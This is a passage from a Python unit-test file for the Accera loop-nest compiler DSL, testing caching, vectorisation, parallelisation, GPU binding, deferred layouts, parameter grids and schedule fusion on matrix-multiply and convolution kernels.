@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
jj = schedule.split(j, 128)
kk = schedule.split(k, 256)
kkk = schedule.split(kk, 4)
jjj = schedule.split(jj, 16)
jjjj = schedule.split(jjj, 8)
ii = schedule.split(i, 6)
schedule.reorder(j, k, i, jj, kk, kkk, ii, jjj, jjjj)
plan = schedule.create_plan()
AA = plan.cache(A, level=5, trigger_level=7, layout=Array.Layout.FIRST_MAJOR)
AAA = plan.cache(AA, level=3, trigger_level=5, layout=Array.Layout.LAST_MAJOR)
BB = plan.cache(B, level=6, trigger_level=7, layout=Array.Layout.FIRST_MAJOR)
BBB = plan.cache(BB, level=2, trigger_level=5, layout=Array.Layout.LAST_MAJOR)
CC = plan.cache(C, level=8, layout=Array.Layout.FIRST_MAJOR)
CCC = plan.cache(CC, level=6, layout=Array.Layout.LAST_MAJOR)
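# Informal reading: caching a cache handle (AA -> AAA, BB -> BBB,
# CC -> CCC) builds a two-level copy hierarchy; `level` counts loops
# from the innermost outward, and each fill point (trigger_level) sits
# at or above its cache level.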
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
self._verify_plan(
plan, [A, B, C], "test_hierarchical_caching", correctness_check_values=correctness_check_values
)
class DSLTest_07PlansVectorizationParallelization(unittest.TestCase):
def _verify_plan(self, plan, args: Tuple[Array], package_name, correctness_check_values=None) -> None:
package = Package()
function = package.add(plan, args, base_name="vectorization_parallelization_test")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_unroll(self) -> None:
from accera import Target, Nest
A = Array(role=Array.Role.INPUT, shape=(3, 5))
my_target = Target(category=Target.Category.CPU)
nest = Nest(shape=(3, 5))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] *= 2.0
plan1 = nest.create_plan(my_target)
plan1.unroll(index=j)
self._verify_plan(plan1, [A], "test_unroll1")
plan2 = nest.create_plan(my_target)
plan2.unroll(index=i)
self._verify_plan(plan2, [A], "test_unroll2")
def test_vectorize(self) -> None:
from accera import Target, Nest
A = Array(role=Array.Role.INPUT, shape=(64, ))
B = Array(role=Array.Role.INPUT, shape=(64, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(64, ))
my_target = Target(category=Target.Category.CPU, vector_bytes=16, vector_registers=2)
nest = Nest(shape=(64, ))
i = nest.get_indices()
@nest.iteration_logic
def _():
C[i] = A[i] * B[i]
plan = nest.create_plan(my_target)
plan.vectorize(index=i)
self._verify_plan(plan, [A, B, C], "test_vectorize")
def test_kernelize(self) -> None:
from accera import Target, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 11))
B = Array(role=Array.Role.INPUT, shape=(11, 10))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 10))
nest = Nest(shape=(16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
my_target = Target(category=Target.Category.CPU, vector_bytes=16, vector_registers=2)
plan = nest.create_plan(my_target)
# Shorthand for:
# plan.unroll(i)
# plan.unroll(j)
# plan.vectorize(k)
plan.kernelize(unroll_indices=(i, j), vectorize_indices=k)
self._verify_plan(plan, [A, B, C], "test_kernelize")
def test_kernelize_2(self) -> None:
from accera import Target, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 16))
B = Array(role=Array.Role.INPUT, shape=(16, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 16))
nest = Nest(shape=(16, 16, 16))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
my_target = Target(category=Target.Category.CPU, vector_bytes=16, vector_registers=2)
plan = nest.create_plan(my_target)
# Shorthand for:
# plan.unroll(i)
# plan.vectorize(j)
# plan.vectorize(k)
plan.kernelize(unroll_indices=(i, ), vectorize_indices=(j, k))
self._verify_plan(plan, [A, B, C], "test_kernelize_2")
@expectedFailure(FailedReason.NOT_IN_PY, "pinning parallelization to CPU cores")
def test_cpu_bind(self) -> None:
A = Array(role=Array.Role.INPUT, shape=(16, 11))
B = Array(role=Array.Role.INPUT, shape=(11, 10))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 10))
nest = Nest(shape=(16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
target = Target("HOST", num_threads=16)
plan = nest.create_plan(target)
plan.parallelize(indices=(i, j, k), pin=(target.cores[0], target.cores[1])) # TODO: confirm syntax
self._verify_plan(plan, [A, B, C], "test_cpu_bind")
def test_gpu_bind(self) -> None:
M = 128
N = 256
K = 256
A = Array(role=Array.Role.INPUT, shape=(M, K))
B = Array(role=Array.Role.INPUT, shape=(K, N))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, N))
nest = Nest(shape=(M, N, K))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
v100 = Target(Target.Model.NVIDIA_V100, category=Target.Category.GPU)
plan = nest.create_plan(v100)
plan.bind(mapping={
i: v100.GridUnit.BLOCK_X,
j: v100.GridUnit.THREAD_X,
k: v100.GridUnit.THREAD_Y
})
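# Rough CUDA reading of this mapping (illustrative, not emitted code):
# i -> blockIdx.x, j -> threadIdx.x, k -> threadIdx.y, so each thread
# accumulates the partial products of C[i, j] for its slice of k.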
test_name = "test_gpu_bind"
package = Package()
function = package.add(plan, args=(A, B, C), base_name=test_name)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / test_name
with verifiers.VerifyPackage(self, test_name, output_dir, file_list=[f"{test_name}.cu",
f"{test_name}.hat"]) as v:
package.build(
name=test_name,
format=Package.Format.MLIR | Package.Format.CUDA | Package.Format.HAT_PACKAGE,
mode=Package.Mode.RELEASE, # Package.Mode.DEBUG,
output_dir=output_dir
)
def test_scheduling_strategies(self) -> None:
A = Array(role=Array.Role.INPUT, shape=(256, 1024))
B = Array(role=Array.Role.INPUT, shape=(1024, 512))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(256, 512))
nest = Nest(shape=(256, 512, 1024))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
target = Target("HOST", num_threads=16)
# disable correctness checking on windows because the
# install location of libomp.dll is non-standard as of now
if sys.platform.startswith('win'):
correctness_check_values = None
else:
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
schedule = nest.create_schedule()
ii = schedule.split(i, A.shape[0] // min(4, target.num_threads))
# set the index (k) that cannot be parallelized as innermost
schedule.reorder(i, ii, j, k)
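# With OpenMP-backed parallelization (note the libomp dependency above),
# "static" divides the iterations evenly among threads up front, while
# "dynamic" hands out chunks to threads as they become free.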
for policy in ["static", "dynamic"]:
plan = schedule.create_plan(target)
# wrong order
with self.assertRaises(ValueError):
plan.parallelize(indices=(k, ii), policy=policy)
# non-contiguous
with self.assertRaises(ValueError):
plan.parallelize(indices=(i, j), policy=policy)
# non-collapsed
plan.parallelize(indices=i, policy=policy)
self._verify_plan(plan, [A, B, C], f"test_parallelize_i_{policy}", correctness_check_values)
# parallelizing middle index
plan_ii = schedule.create_plan(target)
plan_ii.parallelize(indices=ii, policy=policy)
self._verify_plan(plan_ii, [A, B, C], f"test_parallelize_ii_{policy}", correctness_check_values)
# partial collapsed
plan_partial = schedule.create_plan(target)
plan_partial.parallelize(indices=(i, ii, j), policy=policy)
self._verify_plan(plan_partial, [A, B, C], f"test_parallelize_i_ii_j_{policy}", correctness_check_values)
# partial collapsed inner indices
plan_partial_inner = schedule.create_plan(target)
plan_partial_inner.parallelize(indices=(ii, j), policy=policy)
self._verify_plan(
plan_partial_inner, [A, B, C], f"test_parallelize_ii_j_{policy}", correctness_check_values
)
# fully collapsed will result in correctness issues because parallelizing k can stomp on the C matrix
# where multiple threads try to update C[i, j] for different values of k
class DSLTest_08DeferredLayout(unittest.TestCase):
def _verify_package(self, plan, args, package_name, correctness_check_values) -> None:
package = Package()
function = package.add(plan, args, base_name="deferred_layout")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_deferred_layout_predefined(self) -> None:
matrix = np.random.rand(128, 128).astype(np.float32)
B_test = np.random.random(matrix.shape).astype(np.float32)
for layout in [Array.Layout.FIRST_MAJOR, Array.Layout.LAST_MAJOR]:
A = Array(role=Array.Role.CONST, data=matrix, layout=Array.Layout.DEFERRED)
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=matrix.shape)
nest = Nest(shape=matrix.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
B[i, j] += A[i, j]
# create a cache for the constant array
plan1 = nest.create_plan()
AA = plan1.cache(A, i, layout=layout) # , thrifty=True) # TODO
# create another cache, using a different plan, for testing purposes
plan2 = nest.create_plan()
BB = plan2.cache(B, i)
with self.assertRaises(ValueError):
B.deferred_layout(cache=BB) # non-const array
with self.assertRaises(ValueError):
A.deferred_layout(cache=BB) # wrong cache
# update the constant array's layout based on the cache
A.deferred_layout(cache=AA)
self.assertEqual(A.layout, AA.layout)
with self.assertRaises(ValueError):
A.deferred_layout(cache=AA) # duplicate
package_name = f"test_deferred_layout_predefined_{layout}".replace(".", "_") # sanitize path name
self._verify_package(plan1, (B, ), package_name, {
"pre": [B_test],
"post": [B_test + matrix]
})
def test_deferred_layout_coefficients(self) -> None:
matrix = np.random.rand(128, 128).astype(np.float32)
B_test = np.random.random(matrix.shape).astype(np.float32)
for layout in [(128, 1), (1, 128)]:
A = Array(role=Array.Role.CONST, data=matrix, layout=Array.Layout.DEFERRED)
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=matrix.shape)
nest = Nest(shape=matrix.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
B[i, j] += A[i, j]
plan = nest.create_plan()
AA = plan.cache(A, i, layout=layout) # , thrifty=True) # TODO
A.deferred_layout(cache=AA)
self.assertEqual(A.layout, AA.layout)
package_name = f"test_deferred_layout_coefficients_{'_'.join(map(str, layout))}"
self._verify_package(plan, (B, ), package_name, {
"pre": [B_test],
"post": [B_test + matrix]
})
class DSLTest_09Parameters(unittest.TestCase):
def test_parameterization_1(self) -> None:
from accera import create_parameters, Nest
P0, P1, P2, P3 = create_parameters(4)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P0, P2))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P2, P1))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(P0, P1))
nest = Nest(shape=(P0, P1, P2))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += P3 * A[i, k] * B[k, j]
package = Package()
package_name = "test_parameterization_1"
# Use the templated nest to add two different functions to the package
package.add(
nest, args=(A, B, C), parameters={
P0: 16,
P1: 16,
P2: 16,
P3: 1.0
}, base_name="matmul_16_16_16_1"
)
package.add(
nest, args=(A, B, C), parameters={
P0: 32,
P1: 32,
P2: 32,
P3: 2.0
}, base_name="matmul_32_32_32_2"
)
P4, P5 = create_parameters(2)
# Create a parameterized schedule
schedule = nest.create_schedule()
ii = schedule.split(i, size=P4)
P6 = create_parameters(1)
schedule.reorder(order=P6)
# Create a parameterized plan
plan = schedule.create_plan()
plan.cache(A, level=P5)
# Add another function to the package
package.add(
plan,
args=(A, B, C),
parameters={
P0: 16,
P1: 16,
P2: 16,
P3: 1.0,
P4: 4,
P5: 2,
P6: (j, k, i, ii)
},
base_name="alternative_matmul_16_16_16"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_parameterization_2(self) -> None:
from accera import create_parameters, Nest
P0, P1, P2, P3 = create_parameters(4)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P0, P2))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P2, P1))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(P0, P1))
nest = Nest(shape=(P0, P1, P2))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += P3 * A[i, k] * B[k, j]
package = Package()
package_name = "test_parameterization_2"
P4, P5 = create_parameters(2)
# Create a parameterized schedule
schedule = nest.create_schedule()
ii = schedule.split(i, size=P4)
jj = schedule.split(j, size=P4)
kk = schedule.split(k, size=P4)
P6, P7, P8 = create_parameters(3)
schedule.reorder(order=P6)
# Create a parameterized plan
plan = schedule.create_plan()
plan.cache(A, level=P5)
plan.kernelize(unroll_indices=P7, vectorize_indices=P8)
# Add another function to the package
package.add(
plan,
args=(A, B, C),
parameters={
P0: 256,
P1: 256,
P2: 256,
P3: 1.0,
P4: 4,
P5: 2,
P6: (j, k, i, ii, jj, kk),
P7: (ii, jj),
P8: kk
},
base_name="matmul_256_256_256"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_parameterization_3(self) -> None:
from accera import create_parameters, Nest
for N in [10, 224]: # input sizes
for K in [1, 3, 5]: # filter sizes
M = N - K + 1 # output size
P = create_parameters(1)
A = Array(role=Array.Role.INPUT, shape=(N, ))
B = Array(role=Array.Role.INPUT, shape=(K, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, ))
nest = Nest(shape=(M, K))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
C[i] += A[i + j] * B[j]
schedule = nest.create_schedule()
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + np.convolve(np.flip(B_test), A_test, "valid")]
}
# Skew dimension i with respect to dimension j, unrolling any resulting loops smaller than P.
schedule.skew(i, j, P)
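# (Conceptually, skewing i by j shifts the staircase-shaped dependency
# pattern of the convolution into a rectangular iteration space; with
# P = 0, no boundary loops are small enough to be unrolled.)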
# create a HAT package and add the function to it
package = Package()
package_name = f"test_parameterization_3_skew_i_j_{N}_{K}"
function = package.add(
schedule, args=(A, B, C), parameters={P: 0}, base_name=f"schedule_test_skew_i_j_{N}_{K}"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name,
before=correctness_check_values["pre"],
after=correctness_check_values["post"]
)
def test_parameterization_4(self) -> None:
from accera import create_parameters, Nest
M = 16
N = 10
S = 11
type = ScalarType.float32
A = Array(role=Array.Role.INPUT, element_type=type, shape=(M, S))
B = Array(role=Array.Role.INPUT, element_type=type, shape=(S, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=type, shape=(M, N))
nest = Nest(shape=(M, N, S))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
P1, P2, P3, P4, P5, P6 = create_parameters(6)
# Adds empty elements to the beginning of dimension i, j, k
schedule.pad(i, P1)
ii = schedule.split(i, P2) # (2 + 16) // 3
# should result in these loops for i, ii
# i: [2, 3:3), ii: [0, 1:1) <-- partial (front padding)
# i: [3, 18:3), ii: [0, 3:1) <-- full
schedule.pad(j, P3)
jj = schedule.split(j, P4) # (3 + 10) // 3
# should result in these loops for j, jj
# j: [3, 12:3), jj: [0, 3:1) <-- full (front padding == split size)
# j: [12, 13:3), jj: [0, 1:1) <-- partial (automatic back padding)
schedule.pad(k, P5)
kk = schedule.split(k, P6) # (11 + 11) // 4
# should result in these loops for k, kk
# k: [11, 12:1), kk: [0, 1:1) <-- partial
# k: [12, 20:4), kk: [0, 4:1) <-- full
# k: [20, 22:4), kk: [0, 2:1) <-- partial (automatic back padding)
schedule.reorder(i, ii, k, j, jj, kk)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
# create a HAT package and add the function to it
package = Package()
package_name = "test_parameterization_4_pad"
function = package.add(
schedule,
args=(A, B, C),
parameters={
P1: 2,
P2: 3,
P3: 3,
P4: 3,
P5: 11,
P6: 4
},
base_name="schedule_test_pad_parameter"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_parameterization_5(self) -> None:
from accera import create_parameters
A = Array(role=Array.Role.INPUT, shape=(256, 1024))
B = Array(role=Array.Role.INPUT, shape=(1024, 512))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(256, 512))
nest = Nest(shape=(256, 512, 1024))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
target = Target("HOST", num_threads=16)
assert target.architecture == Target.Architecture.HOST
# disable correctness checking on windows because the
# install location of libomp.dll is non-standard as of now
if sys.platform.startswith('win'):
correctness_check_values = None
else:
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
schedule = nest.create_schedule()
ii = schedule.split(i, A.shape[0] // target.num_threads)
# set the index (k) that cannot be parallelized as innermost
schedule.reorder(i, ii, j, k)
P1, P2, P3, P4, P5, P6, P7, P8 = create_parameters(8)
for policy in ["static", "dynamic"]:
plan = schedule.create_plan(target)
# non-collapsed
plan.parallelize(indices=P1, policy=P2)
package_name = f"parameterized_test_parallelize_i_{policy}"
package = Package()
function = package.add(
plan,
args=[A, B, C],
parameters={
P1: i,
P2: policy
},
base_name=f"parameterized_vectorization_parallelization_test_i_{policy}"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
# parallelizing middle index
plan_ii = schedule.create_plan(target)
plan_ii.parallelize(indices=P3, policy=P4)
package_name = f"parameterized_test_parallelize_ii_{policy}"
package_ii = Package()
function_ii = package_ii.add(
plan_ii,
args=[A, B, C],
parameters={
P3: ii,
P4: policy
},
base_name=f"parameterized_vectorization_parallelization_test_ii_{policy}"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package_ii.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function_ii.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
# partial collapsed
plan_partial = schedule.create_plan(target)
plan_partial.parallelize(indices=P5, policy=P6)
package_name = f"parameterized_test_parallelize_i_ii_j_{policy}"
package_partial = Package()
function_partial = package_partial.add(
plan_partial,
args=[A, B, C],
parameters={
P5: (i, ii, j),
P6: policy
},
base_name=f"parameterized_vectorization_parallelization_test_i_ii_j_{policy}"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package_partial.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function_partial.name,
before=correctness_check_values["pre"],
after=correctness_check_values["post"]
)
# partial collapsed inner indices
plan_partial_inner = schedule.create_plan(target)
plan_partial_inner.parallelize(indices=P7, policy=P8)
package_name = f"parameterized_test_parallelize_ii_j_{policy}"
package_partial_inner = Package()
function_partial_inner = package_partial_inner.add(
plan_partial_inner,
args=[A, B, C],
parameters={
P7: (ii, j),
P8: policy
},
base_name=f"parameterized_vectorization_parallelization_test_ii_j_{policy}"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package_partial_inner.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function_partial_inner.name,
before=correctness_check_values["pre"],
after=correctness_check_values["post"]
)
def test_parameterization_grid(self) -> None:
from accera import create_parameters, create_parameter_grid, Nest, Schedule
P0, P1, P2, P3, P4 = create_parameters(5)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P0, P2))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P2, P1))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(P0, P1))
nest = Nest(shape=(P0, P1, P2))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += P3 * A[i, k] * B[k, j]
sched: Schedule = nest.create_schedule()
sched.split(j, P4)
package = Package()
package_name = "test_parameter_grid_generation"
parameter_grid = {
P0: [8, 16],
P1: [16, 32],
P2: [16],
P3: [1.0, 2.0],
P4: [3, 5, 7]
}
parameters = create_parameter_grid(parameter_grid)
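# create_parameter_grid should expand the grid into its cartesian
# product: 2 * 2 * 1 * 2 * 3 = 24 parameter combinations, one "matmul"
# variant per combination.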
package.add(sched, args=(A, B, C), base_name="matmul", parameters=parameters)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_fusion_parameterization_1(self) -> None:
from accera import create_parameters, Nest, fuse
A = Array(role=Array.Role.INPUT, element_type=float, shape=(32, ))
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(32, ))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(1, ))
n0 = Nest([32, 32])
i0, j0 = n0.get_indices()
@n0.iteration_logic
def _():
B[i0] += A[i0] * A[j0]
s0 = n0.create_schedule()
n0_up = Nest(n0.get_shape())
i0_up, j0_up = n0_up.get_indices()
@n0_up.iteration_logic
def _():
B[i0_up] += A[i0_up] * A[j0_up]
s0_up = n0_up.create_schedule()
n1 = Nest([32])
i1 = n1.get_indices()
@n1.iteration_logic
def _():
C[0] += B[i1]
s1 = n1.create_schedule()
P0 = create_parameters(1)
jj0 = s0.split(j0, P0)
jj0_up = s0_up.split(j0_up, 16)
fs = fuse((s0, s1), partial=1)
f, i, j, jj = fs.get_indices()
fs.reorder(i, f, j, jj)
fs_up = fuse((s0_up, s1), partial=1)
f_up, i_up, j_up, jj_up = fs_up.get_indices()
fs_up.reorder(i_up, f_up, j_up, jj_up)
package = Package()
package_name = "test_fusion_parameterization_1"
package.add(fs_up, args=(A, B, C), base_name="fuse_unparameterized_1")
package.add(
fs, args=(A, B, C), parameters={
P0: 16,
}, base_name="fuse_1"
)
package.add(
fs, args=(A, B, C), parameters={
P0: 3,
}, base_name="fuse_2"
)
package.add(
fs, args=(A, B, C), parameters=[{
P0: 5
}, {
P0: 7
}], base_name="fuse_3"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_fusion_parameterization_2(self) -> None:
"""
Goes through a different codepath from the above tests because the
schedules are emitted directly prior to the fused schedule, which
matters because the fused schedule has references to the schedule
"""
from accera import create_parameters, Nest, fuse
A = Array(role=Array.Role.INPUT, element_type=float, shape=(32, ))
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(32, ))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(1, ))
n0 = Nest([32, 32])
i0, j0 = n0.get_indices()
@n0.iteration_logic
def _():
B[i0] += A[i0] * A[j0]
s0 = n0.create_schedule()
n1 = Nest([32])
i1 = n1.get_indices()
@n1.iteration_logic
def _():
C[0] += B[i1]
s1 = n1.create_schedule()
P0 = create_parameters(1)
jj0 = s0.split(j0, P0)
fs = fuse((s0, s1), partial=1)
package = Package()
package_name = "test_fusion_parameterization_2"
package.add(
s0, args=(A, B), parameters={P0: 16}, base_name="s0_1"
)
package.add(
s0, args=(A, B), parameters={P0: 32}, base_name="s0_2"
)
package.add(
s1, args=(C, B), parameters={P0: 16}, base_name="s1_1"
)
package.add(
fs, args=(A, B, C), parameters={
P0: 16,
}, base_name="fuse_1"
)
package.add(
fs, args=(A, B, C), parameters={
P0: 32,
}, base_name="fuse_2"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_fusion_parameterization_3(self) -> None:
from accera import create_parameters, Nest, fuse
A = Array(role=Array.Role.INPUT, element_type=float, shape=(32, ))
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(32, ))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(1, ))
n0 = Nest([32, 32])
i0, j0 = n0.get_indices()
@n0.iteration_logic
def _():
B[i0] += A[i0] * A[j0]
s0 = n0.create_schedule()
n1 = Nest([32])
i1 = n1.get_indices()
@n1.iteration_logic
def _():
C[0] += B[i1]
s1 = n1.create_schedule()
P0, P1 = create_parameters(2)
jj0 = s0.split(j0, P0)
fs = fuse((s0, s1), partial=1)
f, i, j, jj = fs.get_indices()
ii = fs.split(i, P1)
fs.reorder(f, i, j, ii, jj)
package = Package()
package_name = "test_fusion_parameterization_3"
package.add(
fs, args=(A, B, C), parameters={
P0: 16,
P1: 8
}, base_name="fuse_1"
)
package.add(
fs, args=(A, B, C), parameters={
P0: 32,
P1: 4,
}, base_name="fuse_2"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_fusion_parameterization_4(self) -> None:
from accera import create_parameters, Nest, fuse, create_parameter_grid
A = Array(role=Array.Role.INPUT, element_type=float, shape=(128, ))
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(128, ))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(1, ))
n0 = Nest([128, 128])
i0, j0 = n0.get_indices()
@n0.iteration_logic
def _():
B[i0] += A[i0] * A[j0]
s0 = n0.create_schedule()
n1 = Nest([128])
i1 = n1.get_indices()
@n1.iteration_logic
def _():
C[0] += B[i1]
s1 = n1.create_schedule()
P0, P1, P2 = create_parameters(3)
jj0 = s0.split(j0, P0)
fs = fuse((s0, s1), partial=1)
f, i, j, jj = fs.get_indices()
ii = fs.split(i, P1)
fs.reorder(i, f, j, ii, jj)
jjj = fs.split(jj, P2)
package = Package()
package_name = "test_fusion_parameterization_4"
# Expected loop structure
# P0 = 16
# P1 = 8
# P2 = 4
# for i in range(128, step=P1):
# for f in range(2):
# if f == 0:
# for j in range(128, step=P0):
# for ii in range(P1):
# for jj in range(P0, step=P2):
# for jjj in range(P2):
# ...
# if f == 1:
# for ii in range(P1):
# ...
package.add(
fs, args=(A, B, C), parameters={
P0: 16,
P1: 8,
P2: 4
}, base_name="fuse_1"
)
# Expected loop structure
# P0 = 32
# P1 = 4
# P2 = 8
# for i in range(128, step=P1):
# for f in range(2):
# if f == 0:
# for j in range(128, step=P0):
# for ii in range(P1):
# for jj in range(P0, step=P2):
# for jjj in range(P2):
# ...
# if f == 1:
# for ii in range(P1):
# ...
package.add(
fs, args=(A, B, C), parameters={
P0: 32,
P1: 4,
P2: 8
}, base_name="fuse_2"
)
package.add(
fs,
args=(A, B, C),
parameters=create_parameter_grid({
P0: [64, 8],
P1: [12, 16, 20],
P2: [2, 10]
}),
base_name="fuse_grid"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_parameterization_auxiliary_data(self) -> None:
from accera import create_parameters, create_parameter_grid, Nest, Schedule
from hatlib import HATPackage
P0, P1, P2, P3, P4 = create_parameters(5)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P0, P2))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P2, P1))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(P0, P1))
nest = Nest(shape=(P0, P1, P2))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += P3 * A[i, k] * B[k, j]
